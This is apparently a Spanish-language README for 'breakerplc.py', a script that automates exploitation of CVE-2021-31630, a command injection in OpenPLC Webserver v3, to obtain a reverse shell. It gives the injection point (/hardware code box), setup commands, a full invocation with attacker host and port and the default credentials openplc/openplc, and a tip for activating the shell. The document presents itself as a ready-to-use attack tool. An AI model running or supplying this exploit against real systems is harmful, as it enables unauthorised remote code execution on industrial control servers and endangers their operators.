
Esto es una automatización de la explotación de cve-2021-31630
Este script explota automáticamente una vulnerabilidad en OpenPLC Web Server v3.
Podrás crear una Reverse Shell automática con el servidor sin necesidad de usar técnicas manuales.
Detalle de CVE-2021-31630 La inyección de comandos en Open PLC Webserver v3 permite a atacantes remotos ejecutar código arbitrario a través del componente "Hardware Layer Code Box" en la página "/hardware" de la aplicación.
El script fue personalizado para que, después de completar el registro del script en OpenPLC, genere la shell de la máquina en la misma terminal.
Usa el siguiente comando (recomendamos crear un entorno virtual de Python para instalar las dependencias). # Sin embargo, el script breakerplc.py debe ejecutarse fuera del entorno virtual.
sudo apt update
pip3 install requests
¿Cómo usar? Puedes usar esta línea de comandos (abajo).
python breakerplc.py -lh <tu ip local> -lp 4444 <http://ip de la máquina:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

IMPORTANTE
Después de conectarte, debes escribir "whoami" o "ls" para romper la línea de código y devolver la shell.
